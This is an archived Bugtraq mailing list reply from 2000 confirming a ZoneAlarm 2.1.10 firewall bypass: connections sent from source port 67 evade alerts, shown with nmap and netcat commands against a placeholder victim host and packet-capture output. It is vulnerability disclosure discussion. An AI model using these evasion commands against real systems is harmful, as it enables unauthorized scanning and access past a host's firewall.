Bugtraq mailing list archives
Re: ZoneAlarm
From: vision () WHITEHATS COM (Max Vision)
Date: Wed, 26 Apr 2000 02:50:33 -0700
On Mon, 24 Apr 2000, Alfred Huger wrote:
Additionally, using nmap's -f flag allows you to send traffic past ZoneAlarm without any alerts.I set up a copy on a local machine here and while I found that source port scans from 67 slipped past the firewall -f seemed to be alerted on just fine. Can anyone else comment to this?
Hi Al, I get the same results you did; ZoneAlarm 2.1.10 alerts on a fragmented SYN scan, but does not make any noise when the source port is set to 67. # nmap -sS -p 139 -v -f -P0 victim.example.com Initiating SYN half-open stealth scan against victim.example.com (23.23.23.23) 04/26-02:11:52.260668 attacker -> 23.23.23.23 TCP TTL:61 TOS:0x0 ID:15452 MF Frag Offset: 0x0 Frag Size: 0x10 BC 49 00 8B 4D 4B C7 11 00 00 00 00 50 02 08 00 .I..MK......P... 04/26-02:11:52.260745 attacker -> 23.23.23.23 TCP TTL:61 TOS:0x0 ID:15452 Frag Offset: 0x2 Frag Size: 0x4 CA 49 00 00 .I.. ZoneAlarm reports "The firewall has blocked Internet access to your computer (NetBIOS Session) from attacker.example.com (TCP Port 3133)." When I add the option for source port 67 (-g 67) ZoneAlarm does not alert - however, the packets do not seem to be delivered either (no RST nor SYN+ACK). Now if you remove fragmentation from the picture, it looks like you can use source porting (67 anyway) to circumvent the ZoneAlarm software. # nc -p 67 victim.example.com 21 220 Serv-U FTP-Server v2.5e for WinSock ready... quit Without the bootp source port this connection is dropped and an alert is generated. Max
Current thread:
- Re: ZoneAlarm Alfred Huger (Apr 24)
- Re: ZoneAlarm Max Vision (Apr 26)